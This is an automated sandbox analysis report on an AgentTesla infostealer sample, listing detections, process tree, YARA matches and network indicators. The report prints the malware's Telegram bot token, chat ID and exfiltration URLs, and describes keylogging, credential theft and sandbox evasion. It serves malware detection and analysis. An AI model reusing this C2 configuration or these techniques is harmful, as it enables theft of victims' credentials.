Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW ORDER.exe

Overview

General Information

Sample Name:NEW ORDER.exe
Analysis ID:680495
MD5:8577851a51c92b4d637b3ac6f58763a1
SHA1:eb981f97bd164fc30a36eacefee119bd90db9ed9
SHA256:f39991524680779f0c158a55fdd1d2c2802d88bc36c341c97b60756312dbe1cc
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • NEW ORDER.exe (PID: 4932 cmdline: "C:\Users\user\Desktop\NEW ORDER.exe" MD5: 8577851A51C92B4D637B3AC6F58763A1)
    • schtasks.exe (PID: 3372 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • NEW ORDER.exe (PID: 5108 cmdline: {path} MD5: 8577851A51C92B4D637B3AC6F58763A1)
    • svchost.exe (PID: 3372 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • WerFault.exe (PID: 5624 cmdline: C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "5597287344", "Chat URL": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.NEW ORDER.exe.3facab0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.NEW ORDER.exe.3facab0.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.NEW ORDER.exe.3facab0.2.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30aba:$s10: logins
                • 0x30521:$s11: credential
                • 0x2ca5e:$g1: get_Clipboard
                • 0x2ca6c:$g2: get_Keyboard
                • 0x2ca79:$g3: get_Password
                • 0x2dd6c:$g4: get_CtrlKeyDown
                • 0x2dd7c:$g5: get_ShiftKeyDown
                • 0x2dd8d:$g6: get_AltKeyDown
                0.2.NEW ORDER.exe.3facab0.2.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
                • 0x2e15e:$a13: get_DnsResolver
                • 0x2c957:$a20: get_LastAccessed
                • 0x2eadc:$a27: set_InternalServerPort
                • 0x2edf8:$a30: set_GuidMasterKey
                • 0x2ca5e:$a33: get_Clipboard
                • 0x2ca6c:$a34: get_Keyboard
                • 0x2dd7c:$a35: get_ShiftKeyDown
                • 0x2dd8d:$a36: get_AltKeyDown
                • 0x2ca79:$a37: get_Password
                • 0x2d518:$a38: get_PasswordHash
                • 0x2e55e:$a39: get_DefaultCredentials
                7.0.NEW ORDER.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 10 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.4149.154.167.220231534432851779 08/08/22-17:42:49.480990
                  SID:2851779
                  Source Port:23153
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: NEW ORDER.exeVirustotal: Detection: 49%Perma Link
                  Antivirus / Scanner detection for submitted sample
                  Source: NEW ORDER.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\HvabCK.exeAvira: detection malicious, Label: HEUR/AGEN.1235429
                  Machine Learning detection for sample
                  Source: NEW ORDER.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\HvabCK.exeJoe Sandbox ML: detected
                  Source: 7.0.NEW ORDER.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 7.0.NEW ORDER.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5597287344", "Chat URL": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument"}
                  Source: NEW ORDER.exe.4932.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendMessage"}
                  Source: NEW ORDER.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: NEW ORDER.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:23153 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: POST /bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da7969e2d70cb4Host: api.telegram.orgContent-Length: 770Expect: 100-continueConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                  Source: NEW ORDER.exe, 00000007.00000002.502497104.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: NEW ORDER.exe, 00000007.00000002.504032393.0000000006740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gesqcS.com
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: NEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comCu
                  Source: NEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comd
                  Source: NEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comh
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: NEW ORDER.exe, 00000000.00000003.235118854.0000000005C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comothf
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: NEW ORDER.exe, 00000000.00000003.238918778.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: NEW ORDER.exe, 00000000.00000003.239721792.0000000005C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: NEW ORDER.exe, 00000000.00000003.239721792.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.239784127.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlh
                  Source: NEW ORDER.exe, 00000000.00000003.239369021.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: NEW ORDER.exe, 00000000.00000003.244166604.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerse
                  Source: NEW ORDER.exe, 00000000.00000003.239168700.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
                  Source: NEW ORDER.exe, 00000000.00000003.239093431.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerst
                  Source: NEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comce
                  Source: NEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitu
                  Source: NEW ORDER.exe, 00000000.00000002.269549647.00000000014D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comt
                  Source: NEW ORDER.exe, 00000000.00000003.230978289.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: NEW ORDER.exe, 00000000.00000003.231040731.0000000005C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comnK
                  Source: NEW ORDER.exe, 00000000.00000003.234284743.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234068944.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.235384051.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234357988.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: NEW ORDER.exe, 00000000.00000003.234284743.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn.
                  Source: NEW ORDER.exe, 00000000.00000003.234493545.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: NEW ORDER.exe, 00000000.00000003.233743153.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.233723837.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnF
                  Source: NEW ORDER.exe, 00000000.00000003.234068944.0000000005C57000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.234627581.0000000005C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnGZ
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: NEW ORDER.exe, 00000000.00000003.241408459.0000000005C63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/L
                  Source: NEW ORDER.exe, 00000000.00000003.242718317.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241924098.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241560139.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242251783.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.241387291.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242063281.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.242521890.0000000005C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: NEW ORDER.exe, 00000000.00000003.240428883.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: NEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comb
                  Source: NEW ORDER.exe, 00000000.00000003.230277613.0000000005C53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comeG
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: NEW ORDER.exe, 00000000.00000002.285435066.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                  Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                  Source: NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/
                  Source: NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument
                  Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocumentdocument-----
                  Source: NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                  Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                  Source: unknownHTTP traffic detected: POST /bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da7969e2d70cb4Host: api.telegram.orgContent-Length: 770Expect: 100-continueConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: api.telegram.org
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Installs a global keyboard hook
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\NEW ORDER.exe
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06D72E88 SetWindowsHookExW 0000000D,00000000,?,?
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0.2.NEW ORDER.exe.2eb63b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                  Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: NEW ORDER.exe
                  .NET source code contains very large array initializations
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b294C783Du002d9AEAu002d48A9u002d8C51u002dBFB41AF27519u007d/u00344BAB482u002dFBA8u002d4952u002d9839u002dDE6C7A63A330.csLarge array initialization: .cctor: array initializer size 11689
                  .NET source code contains very large strings
                  Source: NEW ORDER.exe, ?QnN??lK?/??EFdowRHI?n?.csLong String: Length: 20037
                  Source: HvabCK.exe.0.dr, ?QnN??lK?/??EFdowRHI?n?.csLong String: Length: 20037
                  Source: 0.0.NEW ORDER.exe.960000.0.unpack, ?QnN??lK?/??EFdowRHI?n?.csLong String: Length: 20037
                  Source: NEW ORDER.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0.2.NEW ORDER.exe.2eb63b8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                  Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
